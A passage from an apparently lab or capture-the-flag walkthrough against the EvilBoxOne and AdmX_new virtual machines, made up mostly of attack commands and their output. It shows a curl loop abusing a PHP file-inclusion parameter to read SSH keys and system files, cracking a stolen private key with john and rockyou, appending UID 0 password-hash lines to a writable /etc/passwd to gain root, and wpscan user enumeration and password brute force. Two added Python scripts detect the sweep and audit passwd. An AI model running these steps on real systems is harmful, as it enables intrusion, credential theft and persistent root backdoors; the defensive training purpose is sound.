# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
PrintLastLog no
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem sftp /usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# PermitTTY no
# ForceCommand cvs server
################################################
>>>/etc/ssh/ssh_config:

# This is the ssh client system-wide configuration file. See
# ssh_config(5) for more information. This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.

# Configuration data is parsed as follows:
# 1. command line options
# 2. user-specific file
# 3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.

# Site-wide defaults for some commonly used options. For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.

Host *
# ForwardAgent no
# ForwardX11 no
# ForwardX11Trusted yes
# PasswordAuthentication yes
# HostbasedAuthentication no
# GSSAPIAuthentication no
# GSSAPIDelegateCredentials no
# GSSAPIKeyExchange no
# GSSAPITrustDNS no
# BatchMode no
# CheckHostIP yes
# AddressFamily any
# ConnectTimeout 0
# StrictHostKeyChecking ask
# IdentityFile ~/.ssh/id_rsa
# IdentityFile ~/.ssh/id_dsa
# IdentityFile ~/.ssh/id_ecdsa
# IdentityFile ~/.ssh/id_ed25519
# Port 22
# Protocol 2
# Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc
# MACs hmac-md5,hmac-sha1,umac-64@openssh.com
# EscapeChar ~
# Tunnel no
# TunnelDevice any:any
# PermitLocalCommand no
# VisualHostKey no
# ProxyCommand ssh -q -W %h:%p gateway.example.com
# RekeyLimit 1G 1h
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
################################################
>>>/etc/ssh/ssh_host_dsa_key:
################################################
>>>/etc/ssh/ssh_host_dsa_key:
################################################
>>>/etc/ssh/ssh_host_dsa_key.pub:
################################################
>>>/etc/ssh/ssh_host_dsa_key.pub:
################################################
>>>/etc/ssh/ssh_host_key:
################################################
>>>/etc/ssh/ssh_host_key:
################################################
>>>/etc/ssh/ssh_host_key.pub:
################################################
>>>/etc/ssh/ssh_host_key.pub:
################################################
>>>/etc/ssh/ssh_host_rsa_key:
################################################
>>>/etc/ssh/ssh_host_rsa_key:
################################################
>>>/etc/ssh/ssh_host_rsa_key.pub:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsg5B3Ae75r4szTNFqG247Ea8vKjxulITlFGE9YEK4KLJA86TskXQn9E24yX4cYMoF0WDn7JD782HfHCrV74r8nU2kVTw5Y8ZRyBEqDwk6vmOzMvq1Kzrcj+i4f17saErC9YVgx5/33e7UkLXt3MYVjVPIekf/sxWxS4b6N0+J1xiISNcoL/kmG3L7McJzX6Qx6cWtauJf3HOxNtZJ94WetHArSpUyIsn83P+Quxa/uaUgGPx4EkHL7Qx3AVIBbKA7uDet/pZUchcPq/4gv25DKJH4XIty+5/yNQo1EMd6Ra5A9SmnhWjSxdFqTGHpdKnyYHr4VeZ7cpvpQnoiV4y9 root@EvilBoxOne
################################################
>>>/etc/ssh/ssh_host_rsa_key.pub:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsg5B3Ae75r4szTNFqG247Ea8vKjxulITlFGE9YEK4KLJA86TskXQn9E24yX4cYMoF0WDn7JD782HfHCrV74r8nU2kVTw5Y8ZRyBEqDwk6vmOzMvq1Kzrcj+i4f17saErC9YVgx5/33e7UkLXt3MYVjVPIekf/sxWxS4b6N0+J1xiISNcoL/kmG3L7McJzX6Qx6cWtauJf3HOxNtZJ94WetHArSpUyIsn83P+Quxa/uaUgGPx4EkHL7Qx3AVIBbKA7uDet/pZUchcPq/4gv25DKJH4XIty+5/yNQo1EMd6Ra5A9SmnhWjSxdFqTGHpdKnyYHr4VeZ7cpvpQnoiV4y9 root@EvilBoxOne
################################################
>>>/etc/sysconfig/network:
################################################
>>>/etc/sysconfig/network:
################################################
>>>/home/apache/conf/httpd.conf:
################################################
>>>/home/apache2/conf/httpd.conf:
################################################
>>>/home/bin/stable/apache/php.ini:
################################################
>>>/home2/bin/stable/apache/php.ini:
################################################
>>>/NetServer/bin/stable/apache/php.ini:
################################################
>>>/opt/www/conf/httpd.conf:
################################################
>>>/opt/www/htdocs/index.html:
################################################
>>>/opt/www/htdocs/index.php:
################################################
>>>/opt/xampp/etc/php.ini:
################################################
>>>/PHP/php.ini:
################################################
>>>/php/php.ini:
################################################
>>>/php4/php.ini:
################################################
>>>/php5/php.ini:
################################################
>>>/root/.atftp_history:
################################################
>>>/root/.bashrc:
################################################
>>>/root/.bash_history:
################################################
>>>/root/.mysql_history:
################################################
>>>/root/.nano_history:
################################################
>>>/root/.php_history:
################################################
>>>/root/.profile:
################################################
>>>/root/.ssh/authorized_keys:
################################################
>>>/root/.ssh/identity:
################################################
>>>/root/.ssh/identity.pub:
################################################
>>>/root/.ssh/id_dsa:
################################################
>>>/root/.ssh/id_dsa.pub:
################################################
>>>/root/.ssh/id_rsa:
################################################
>>>/root/.ssh/id_rsa.pub:
################################################
>>>/root/anaconda-ks.cfg:
################################################
>>>/tmp/apache/htdocs/index.html:
################################################
>>>/tmp/apache/htdocs/index.php:
################################################
>>>/usr/lib/php.ini:
################################################
>>>/usr/lib/php/php.ini:
################################################
>>>/usr/local/apache/conf/httpd.conf:
################################################
>>>/usr/local/apache/conf/php.ini:
################################################
>>>/usr/local/apache/htdocs/index.html:
################################################
>>>/usr/local/apache/htdocs/index.php:
################################################
>>>/usr/local/apache/logs/access.log:
################################################
>>>/usr/local/apache/logs/access_log:
################################################
>>>/usr/local/apache/logs/access_logaccess_log.old:
################################################
>>>/usr/local/apache/logs/error.log:
################################################
>>>/usr/local/apache/logs/error_log:
################################################
>>>/usr/local/apache/logs/error_logerror_log.old:
################################################
>>>/usr/local/apache2/conf/httpd.conf:
################################################
>>>/usr/local/apache2/conf/php.ini:
################################################
>>>/usr/local/apache2/htdocs/index.html:
################################################
>>>/usr/local/apache2/htdocs/index.php:
################################################
>>>/usr/local/cpanel/logs:
################################################
>>>/usr/local/cpanel/logs/access_log:
################################################
>>>/usr/local/cpanel/logs/error_log:
################################################
>>>/usr/local/cpanel/logs/license_log:
################################################
>>>/usr/local/cpanel/logs/login_log:
################################################
>>>/usr/local/cpanel/logs/stats_log:
################################################
>>>/usr/local/cpanel/logs/stats_log:
################################################
>>>/usr/local/etc/php.ini:
################################################
>>>/usr/local/httpd/conf/httpd.conf:
################################################
>>>/usr/local/httpd2.2/htdocs/index.html:
################################################
>>>/usr/local/httpd2.2/htdocs/index.php:
################################################
>>>/usr/local/lib/php.ini:
################################################
>>>/usr/local/mysql/bin/mysql:
################################################
>>>/usr/local/mysql/my.cnf:
################################################
>>>/usr/local/php/lib/php.ini:
################################################
>>>/usr/local/php4/lib/php.ini:
################################################
>>>/usr/local/php4/lib/php.ini:
################################################
>>>/usr/local/php4/php.ini:
################################################
>>>/usr/local/php5/etc/php.ini:
################################################
>>>/usr/local/php5/lib/php.ini:
################################################
>>>/usr/local/php5/php5.ini:
################################################
>>>/usr/local/share/examples/php/php.ini:
################################################
>>>/usr/local/share/examples/php4/php.ini:
################################################
>>>/usr/local/tomcat5527/bin/version.sh:
################################################
>>>/usr/local/Zend/etc/php.ini:
################################################
>>>/usr/share/tomcat6/bin/startup.sh:
################################################
>>>/usr/tomcat6/bin/startup.sh:
################################################
>>>/var/apache2/config.inc:
################################################
>>>/var/httpd/conf/httpd.conf:
################################################
>>>/var/httpd/conf/php.ini:
################################################
>>>/var/httpd/conf/php.ini:
################################################
>>>/var/httpd/htdocs/index.html:
################################################
>>>/var/httpd/htdocs/index.php:
################################################
>>>/var/lib/mysql/my.cnf:
################################################
>>>/var/lib/mysql/mysql/user.MYD:
################################################
>>>/var/local/www/conf/httpd.conf:
################################################
>>>/var/local/www/conf/php.ini:
################################################
>>>/var/log/access.log:
################################################
>>>/var/log/access_log:
################################################
>>>/var/log/apache/access.log:
################################################
>>>/var/log/apache/access_log:
################################################
>>>/var/log/apache/error.log:
################################################
>>>/var/log/apache/error_log:
################################################
>>>/var/log/apache2/access.log:
################################################
>>>/var/log/apache2/access_log:
################################################
>>>/var/log/apache2/error.log:
################################################
>>>/var/log/apache2/error_log:
################################################
>>>/var/log/error.log:
################################################
>>>/var/log/error_log:
################################################
>>>/var/log/mysql.log:
################################################
>>>/var/log/mysql/mysql-bin.log:
################################################
>>>/var/log/mysql/mysql-slow.log:
################################################
>>>/var/log/mysql/mysql.log:
################################################
>>>/var/log/mysqlderror.log:
################################################
>>>/var/mail/root:
################################################
>>>/var/mysql.log:
################################################
>>>/var/spool/cron/crontabs/root:
################################################
>>>/var/spool/mail/root:
################################################
>>>/var/www/conf/httpd.conf:
################################################
>>>/var/www/htdocs/index.html:
################################################
>>>/var/www/htdocs/index.php:
################################################
>>>/var/www/index.html:
################################################
>>>/var/www/index.php:
################################################
>>>/var/www/logs/access.log:
################################################
>>>/var/www/logs/access_log:
################################################
>>>/var/www/logs/error.log:
################################################
>>>/var/www/logs/error_log:
################################################
>>>/web/conf/php.ini:
################################################
>>>/www/conf/httpd.conf:
################################################
>>>/www/htdocs/index.html:
################################################
>>>/www/htdocs/index.php:
################################################
>>>/www/php/php.ini:
################################################
>>>/www/php4/php.ini:
################################################
>>>/www/php5/php.ini:
################################################
>>>/xampp/apache/bin/php.ini:
################################################
>>>/xampp/apache/conf/httpd.conf:
################################################
>>>root/.ssh/authorized_keys:
################################################
>>>root/.ssh/identity:
################################################
>>>root/.ssh/identity.pub:
################################################
>>>root/.ssh/id_dsa:
################################################
>>>root/.ssh/id_dsa.pub:
################################################
>>>root/.ssh/id_rsa:
################################################
>>>root/.ssh/id_rsa.pub:

The hits (paths that returned content) are listed below:

  • /etc/crontab: default content
  • /etc/fstab: default content
  • /etc/host.conf: default content
  • /etc/ld.so.conf: default content
  • /etc/network/interfaces: default content
  • /etc/networks: not useful
  • /etc/passwd
  • /etc/resolv.conf: not useful
  • /etc/ssh/sshd_config: default content
  • /etc/ssh/ssh_config: default content
  • /etc/ssh/ssh_host_rsa_key.pub

New details discovered:

  • /etc/passwd
    • tells us there is another user, named mowree
  • /etc/ssh/ssh_host_rsa_key.pub
    • an SSH login lead; the key comment points to root@EvilBoxOne

ssh_dict.txt

/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/ssh_host_dsa_key
/root/.ssh/ssh_host_dsa_key.pub
/root/.ssh/ssh_host_key
/root/.ssh/ssh_host_key.pub
/root/.ssh/ssh_host_rsa_key
/root/.ssh/ssh_host_rsa_key.pub
/home/mowree/.ssh/authorized_keys
/home/mowree/.ssh/identity
/home/mowree/.ssh/identity.pub
/home/mowree/.ssh/id_dsa
/home/mowree/.ssh/id_dsa.pub
/home/mowree/.ssh/id_rsa
/home/mowree/.ssh/id_rsa.pub
/home/mowree/.ssh/ssh_host_dsa_key
/home/mowree/.ssh/ssh_host_dsa_key.pub
/home/mowree/.ssh/ssh_host_key
/home/mowree/.ssh/ssh_host_key.pub
/home/mowree/.ssh/ssh_host_rsa_key
/home/mowree/.ssh/ssh_host_rsa_key.pub

Attack script

#!/bin/bash
# Request every path listed in ssh_dict.txt through the evil.php command
# parameter and print whatever the server returns under a ">>>path:" header.
for i in $(cat ./ssh_dict.txt);
do
echo "###################################"
echo ">>>$i:";
curl "http://192.168.56.105/secret/evil.php?command=$i" -m 1 -s
sleep 0.5
done
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ./s2.sh
###################################
>>>/root/.ssh/authorized_keys:
###################################
>>>/root/.ssh/identity:
###################################
>>>/root/.ssh/identity.pub:
###################################
>>>/root/.ssh/id_dsa:
###################################
>>>/root/.ssh/id_dsa.pub:
###################################
>>>/root/.ssh/id_rsa:
###################################
>>>/root/.ssh/id_rsa.pub:
###################################
>>>/root/.ssh/ssh_host_dsa_key:
###################################
>>>/root/.ssh/ssh_host_dsa_key.pub:
###################################
>>>/root/.ssh/ssh_host_key:
###################################
>>>/root/.ssh/ssh_host_key.pub:
###################################
>>>/root/.ssh/ssh_host_rsa_key:
###################################
>>>/root/.ssh/ssh_host_rsa_key.pub:
###################################
>>>/home/mowree/.ssh/authorized_keys:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
###################################
>>>/home/mowree/.ssh/identity:
###################################
>>>/home/mowree/.ssh/identity.pub:
###################################
>>>/home/mowree/.ssh/id_dsa:
###################################
>>>/home/mowree/.ssh/id_dsa.pub:
###################################
>>>/home/mowree/.ssh/id_rsa:
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
(encrypted key body omitted)
-----END RSA PRIVATE KEY-----
###################################
>>>/home/mowree/.ssh/id_rsa.pub:
###################################
>>>/home/mowree/.ssh/ssh_host_dsa_key:
###################################
>>>/home/mowree/.ssh/ssh_host_dsa_key.pub:
###################################
>>>/home/mowree/.ssh/ssh_host_key:
###################################
>>>/home/mowree/.ssh/ssh_host_key.pub:
###################################
>>>/home/mowree/.ssh/ssh_host_rsa_key:
###################################
>>>/home/mowree/.ssh/ssh_host_rsa_key.pub:
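
From the defender's side, the sweep above leaves a distinctive trace in the web server's access log: one client requesting the same script with a different absolute path in the query string every half second. The following Python script is an added example (not the author's or the target's code) that parses constructed Apache combined-format lines modelled on this write-up's requests and flags both the sensitive paths and the sweep pattern; the sample lines, the SENSITIVE markers and the burst thresholds are assumptions.

```python
"""Spot the evil.php path sweep in Apache access logs (added example).

Constructed sample lines below mimic this write-up's requests:
one client, curl, a different absolute path in ?command= each time.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format; only client, timestamp, target and status are used.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Substrings that make a requested path worth an immediate alert (assumption).
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/.ssh/", "/root/", "/proc/self")

# Constructed sample: 12 dictionary paths from this write-up, one per second,
# followed by one unrelated browser request from another client.
_PATHS = [
    "/etc/crontab", "/etc/fstab", "/etc/host.conf", "/etc/ld.so.conf",
    "/etc/network/interfaces", "/etc/networks", "/etc/passwd",
    "/etc/resolv.conf", "/etc/ssh/sshd_config", "/etc/ssh/ssh_config",
    "/etc/ssh/ssh_host_rsa_key.pub", "/home/mowree/.ssh/id_rsa",
]
SAMPLE_LOG = [
    '192.168.56.102 - - [13/Jul/2023:21:05:%02d +0800] '
    '"GET /secret/evil.php?command=%s HTTP/1.1" 200 %d "-" "curl/7.88.1"'
    % (10 + i, path, 100 + i)
    for i, path in enumerate(_PATHS)
] + [
    '192.168.56.1 - - [13/Jul/2023:21:06:01 +0800] '
    '"GET /index.html?page=2 HTTP/1.1" 200 11000 "-" "Mozilla/5.0"'
]


def parse_line(line):
    """Return the fields we need from one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "client": m["client"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "target": m["target"],
        "status": int(m["status"]),
    }


def path_params(target):
    """(name, value) pairs from the query string whose value looks like a file path."""
    return [
        (name, value)
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True)
        if value.startswith("/") or "../" in value
    ]


def analyse(lines, burst_count=10, burst_seconds=30):
    """Return alert tuples.

    ("sensitive_path", client, param, value) for every request whose path value
    matches SENSITIVE, and ("path_sweep", client, distinct_paths, None) once per
    client that asks for at least burst_count distinct paths within burst_seconds.
    """
    alerts = []
    per_client = defaultdict(list)  # client -> [(timestamp, path value)]
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for param, value in path_params(rec["target"]):
            per_client[rec["client"]].append((rec["ts"], value))
            if any(marker in value for marker in SENSITIVE):
                alerts.append(("sensitive_path", rec["client"], param, value))
    for client, events in per_client.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until the span fits in burst_seconds
            while (events[end][0] - events[start][0]).total_seconds() > burst_seconds:
                start += 1
            distinct = {value for _, value in events[start:end + 1]}
            if len(distinct) >= burst_count:
                alerts.append(("path_sweep", client, len(distinct), None))
                break
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```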

touch id_rsa && curl "http://192.168.56.105/secret/evil.php?command=/home/mowree/.ssh/id_rsa" -m 1 -s > id_rsa && chmod 600 id_rsa

ssh mowree@192.168.56.105 -i id_rsa

/usr/share/john/ssh2john.py ./id_rsa > ./hash_id_rsa

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt


Privilege escalation, method 1:

Check whether any sensitive files exist that we have write permission on:

find / -writable 2>/dev/null | grep 'etc'
┌──(root㉿kali)-[/]
└─# openssl passwd -1
Password:
Verifying - Password:
$1$MIFi7ZAo$H1NkTSlUggj5ZbYSw5H9x.

echo 'root:$1$MIFi7ZAo$H1NkTSlUggj5ZbYSw5H9x.:0:0::/root:/bin/bash' >> /etc/passwd

┌──(root㉿kali)-[/]
└─# openssl passwd -1 -salt jere
Password:
$1$jere$pGQGlxgnH.no4.Pphez9o1

echo 'jere:$1$jere$pGQGlxgnH.no4.Pphez9o1:0:0::/root:/bin/bash' >> /etc/passwd

su jere
root@EvilBoxOne:/home/mowree# id
uid=0(root) gid=0(root) grupos=0(root)
root@EvilBoxOne:/home/mowree# ls
user.txt
root@EvilBoxOne:/home/mowree# cd /
root@EvilBoxOne:/# ls
bin etc initrd.img.old lib64 media proc sbin tmp vmlinuz
boot home lib libx32 mnt root srv usr vmlinuz.old
dev initrd.img lib32 lost+found opt run sys var
root@EvilBoxOne:/# cd root
root@EvilBoxOne:~# ls
root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
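
The escalation above works because /etc/passwd is writable and the system honours a password hash placed directly in its second field. The following Python audit is an added example (not the author's or the box's code) that flags exactly those traces: extra UID 0 accounts, hashes stored in passwd instead of shadow, duplicate names, and a passwd file mode that lets non-root users write it; the sample entries are constructed from this write-up's /etc/passwd dump plus the two lines the escalation appended.

```python
"""Audit /etc/passwd for the backdoor pattern shown above (added example).

Flags: extra UID 0 accounts, a password hash stored directly in passwd
(which bypasses /etc/shadow), empty password fields, duplicate names,
and a passwd file mode that lets non-root users write it.
"""
import os
import stat
from dataclasses import dataclass, field


@dataclass
class Finding:
    line_no: int
    user: str
    reason: str


@dataclass
class Audit:
    findings: list = field(default_factory=list)
    uid0_users: list = field(default_factory=list)  # expected to be just ["root"]


def audit_passwd_text(text: str) -> Audit:
    """Parse passwd-format text and collect suspicious entries."""
    audit = Audit()
    seen = set()
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            audit.findings.append(Finding(line_no, line[:32], "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = parts
        if name in seen:
            audit.findings.append(Finding(line_no, name, "duplicate username"))
        seen.add(name)
        # Normal entries carry "x" (hash lives in /etc/shadow) or a lock marker.
        # A real hash here is what `openssl passwd -1` + `echo >> /etc/passwd` leaves behind.
        if pw == "":
            audit.findings.append(Finding(line_no, name, "empty password field"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            audit.findings.append(Finding(line_no, name, "password hash stored in /etc/passwd"))
        if not uid.isdigit():
            audit.findings.append(Finding(line_no, name, "non-numeric UID"))
            continue
        if int(uid) == 0:
            audit.uid0_users.append(name)
            if name != "root":
                audit.findings.append(Finding(line_no, name, "extra UID 0 account"))
    return audit


def mode_allows_nonroot_write(mode: int) -> bool:
    """True if a st_mode value grants write permission to group or others."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_passwd_file(path: str = "/etc/passwd") -> Audit:
    """Audit a real passwd file, adding a finding if its mode is too permissive."""
    with open(path, encoding="utf-8") as fh:
        audit = audit_passwd_text(fh.read())
    if mode_allows_nonroot_write(os.stat(path).st_mode):
        audit.findings.append(Finding(0, path, "writable by group or others"))
    return audit


# Constructed sample: entries from this write-up's /etc/passwd dump plus the
# two lines the escalation appended (a second root and the jere account).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
root:$1$MIFi7ZAo$H1NkTSlUggj5ZbYSw5H9x.:0:0::/root:/bin/bash
jere:$1$jere$pGQGlxgnH.no4.Pphez9o1:0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    result = audit_passwd_text(SAMPLE_PASSWD)
    print("UID 0 accounts:", result.uid0_users)
    for f in result.findings:
        print(f"line {f.line_no}: {f.user}: {f.reason}")
```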


Target: AdmX_new

https://www.cnblogs.com/shadow-/p/16852264.html

arp-scan -l -I eth0
nmap -sV 192.168.56.200
dirsearch -u "http://192.168.56.200" -x 403
[10:10:08] Starting: 
[10:10:34] 200 - 11KB - /index.html
[10:10:52] 301 - 316B - /tools -> http://192.168.56.200/tools/
[10:10:57] 200 - 7KB - /wordpress/wp-login.php
[10:10:57] 200 - 8KB - /wordpress/

Task Completed


wpscan --url http://192.168.56.200/wordpress --enumerate
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://192.168.56.200/wordpress --enumerate
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.22

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Fri Jul 14 01:34:56 2023

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Proxy-Connection: keep-alive
| - Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:02 <=============> (504 / 504) 100.00% Time: 00:00:02

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:13 <===========> (2568 / 2568) 100.00% Time: 00:00:13

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <====================> (71 / 71) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:00 <=========> (100 / 100) 100.00% Time: 00:00:00

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.56.200/wordpress/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jul 14 01:35:27 2023
[+] Requests Done: 3442
[+] Cached Requests: 4
[+] Data Sent: 1.172 MB
[+] Data Received: 21.453 MB
[+] Memory used: 280.055 MB
[+] Elapsed time: 00:00:31

wpscan --url http://192.168.56.200/wordpress -U admin -P /usr/share/wordlists/rockyou.txt

┌──(kali㉿kali)-[/usr/share/seclists]
└─$ wpscan --url http://192.168.56.200/wordpress -U admin -P /usr/share/wordlists/rockyou.txt

_______________________________________________________________

WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Fri Jul 14 01:40:56 2023

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Proxy-Connection: keep-alive
| - Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
